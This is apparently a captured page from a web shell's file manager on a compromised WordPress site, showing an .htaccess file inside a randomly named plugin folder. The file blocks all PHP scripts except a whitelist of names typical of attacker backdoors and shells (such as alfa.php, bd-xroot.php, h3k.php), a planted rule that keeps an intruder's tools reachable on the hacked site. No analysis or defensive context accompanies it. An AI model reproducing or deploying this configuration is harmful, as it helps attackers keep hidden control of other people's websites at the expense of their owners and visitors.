Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-content
/
plugins
/
zdfdfnfhryyg
:
.htaccess
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<FilesMatch ".*\.(phtml|php|PhP|php5|suspected)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(alfa.php|rk1.php|rk2.php|rk3.php|rk4.php|h3k.php|bps.php|fox.php|root.php|bd-xroot.php|wp-content-css.php|style-css.php|file-manager.php|sami.php|index.php|bdx.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>